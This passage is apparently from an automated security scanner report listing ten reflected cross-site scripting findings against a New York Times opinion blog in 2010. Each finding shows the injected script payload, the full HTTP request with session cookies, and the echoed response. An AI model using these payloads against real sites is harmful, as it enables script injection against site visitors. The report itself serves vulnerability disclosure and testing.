<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/disunion/pagebf645\"><script>alert(1)</script>7bdf5d8d7cb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/errol-morris |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9789f"><script>alert(1)</script>f993fd38ae8 was submitted in the REST URL parameter 2. This input was echoed as 9789f\"><script>alert(1)</script>f993fd38ae8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris9789f"><script>alert(1)</script>f993fd38ae8 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:21:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:21:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris9789f\"><script>alert(1)</script>f993fd38ae8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/errol-morris/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83ca0"><script>alert(1)</script>a5cfaeb2d66 was submitted in the REST URL parameter 3. This input was echoed as 83ca0\"><script>alert(1)</script>a5cfaeb2d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris/feed83ca0"><script>alert(1)</script>a5cfaeb2d66/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:18:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:18:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/feed83ca0\"><script>alert(1)</script>a5cfaeb2d66&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/errol-morris/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59656"><script>alert(1)</script>2a52a42ee88 was submitted in the REST URL parameter 3. This input was echoed as 59656\"><script>alert(1)</script>2a52a42ee88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/errol-morris/page59656"><script>alert(1)</script>2a52a42ee88/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/errol-morris/page59656\"><script>alert(1)</script>2a52a42ee88/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/fixes |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e161d"><script>alert(1)</script>0900389e500 was submitted in the REST URL parameter 2. This input was echoed as e161d\"><script>alert(1)</script>0900389e500 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixese161d"><script>alert(1)</script>0900389e500 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:45 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixese161d\"><script>alert(1)</script>0900389e500&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/fixes/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f0e"><script>alert(1)</script>bf23dd493d7 was submitted in the REST URL parameter 2. This input was echoed as d8f0e\"><script>alert(1)</script>bf23dd493d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixesd8f0e"><script>alert(1)</script>bf23dd493d7/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:46 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixesd8f0e\"><script>alert(1)</script>bf23dd493d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/fixes/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26950"><script>alert(1)</script>349cb5c2268 was submitted in the REST URL parameter 3. This input was echoed as 26950\"><script>alert(1)</script>349cb5c2268 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixes/feed26950"><script>alert(1)</script>349cb5c2268/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/feed26950\"><script>alert(1)</script>349cb5c2268&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/fixes/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f1b"><script>alert(1)</script>7880d35a107 was submitted in the REST URL parameter 3. This input was echoed as 66f1b\"><script>alert(1)</script>7880d35a107 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fixes/page66f1b"><script>alert(1)</script>7880d35a107/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:25:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:25:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/page66f1b\"><script>alert(1)</script>7880d35a107/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/home-fires |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a972"><script>alert(1)</script>0a1b042274f was submitted in the REST URL parameter 2. This input was echoed as 1a972\"><script>alert(1)</script>0a1b042274f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires1a972"><script>alert(1)</script>0a1b042274f HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:26:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:26:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires1a972\"><script>alert(1)</script>0a1b042274f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/home-fires/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465db"><script>alert(1)</script>c3c7c9b644e was submitted in the REST URL parameter 2. This input was echoed as 465db\"><script>alert(1)</script>c3c7c9b644e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires465db"><script>alert(1)</script>c3c7c9b644e/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:26:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:26:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires465db\"><script>alert(1)</script>c3c7c9b644e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/home-fires/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c78f"><script>alert(1)</script>40440eb34cb was submitted in the REST URL parameter 3. This input was echoed as 2c78f\"><script>alert(1)</script>40440eb34cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/home-fires/feed2c78f"><script>alert(1)</script>40440eb34cb/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; 